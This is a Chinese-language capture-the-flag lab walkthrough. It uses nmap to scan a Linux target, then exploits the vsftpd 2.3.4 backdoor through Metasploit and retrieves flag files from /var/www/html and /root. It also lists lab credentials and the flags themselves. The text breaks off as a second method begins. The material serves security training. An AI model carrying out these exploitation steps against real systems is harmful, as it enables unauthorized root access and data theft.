任务实施:
E119-经典赛题-Linux操作系统渗透测试
任务环境说明:
服务器场景:p9_kali-7(用户名:root;密码:toor)
服务器场景操作系统:Kali Linux 192.168.32.172
服务器场景:p9_linux-2(用户名:root;密码:123456)
服务器场景操作系统:Linux(版本未知) 192.168.32.173
网络拓扑
通过本地PC中渗透测试平台Kali对服务器场景Linux进行操作系统扫描渗透测试,并将该操作显示结果“OS Details:”之后的字符串作为FLAG提交;
使用命令nmap -n -T4 -O 172.16.1.8对服务器场景Linux进行操作系统扫描渗透测试,来获得操作系统版本信息
nmap -n -T4 -O 192.168.32.173
本题提交Flag:【 2.6.32-3.10 】
通过本地PC中渗透测试平台Kali对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中MySQL数据库对应的服务版本信息字符串作为FLAG提交;
使用命令nmap -sV 172.16.1.8来扫描系统服务及版本号
nmap -sV 192.168.32.173
扫描结果中并未识别出Mysql的服务版本信息
本题提交Flag:【 unauthorized 】
通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件内容作为FLAG提交;
再次使用命令nmap -sV 172.16.1.8对运行的服务版本号进行扫描,发现了其中运行了ftp服务,并且版本号为2.3.4这个版本存在vsftpd笑脸漏洞,我们通过两种方法对其进行利用。
方法一
使用命令msfconsole打开metasploit渗透测试平台
使用命令search vsftpd_234搜索漏洞利用模块
然后使用命令use exploit/unix/ftp/vsftpd_234_backdoor调用该模块,再然后使用命令show options查看模块的需要配置的参数
使用命令set RHOST 172.16.1.8,最后使用命令exploit进行利用
利用成功,根据题目要求需要获取网站耿根目录下的网页文件的内容,使用命令cat /var/www/html,然后使用cat命令查看该文件
cat /var/www/html
cd /var/www/html
ls
cat qtuposdf.html
或
cat /var/www/html/qtuposdf.html
本题提交Flag:【 zpertgvd 】
通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp文件的文件名称作为FLAG提交;
使用命令ls /root查看root目录下的文件
使用命令cd /root切换路径,使用ls命令进行查看
本题提交Flag:【 asuorwed.bmp 】
通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp的图片文件中的英文单词作为FLAG提交。
将根目录下的文件复制到/var/www/html中,然后在渗透机浏览器中打开
cp asuorwed.bmp /var/www/html
然后在nc客户端使用命令chmod 777 asuorwed.bmp对该文件进行赋权使得所有用户能够查看
chmod 777 asuorwed.bmp
再然后使用命令firefox打开火狐浏览器,输入地址http://172.16.1.8/asuorwed.bmp
本题提交Flag:【 sunny 】
对其进行利用的方法二:
使用命令ftp 172.16.1.8转到ftp认证交互界面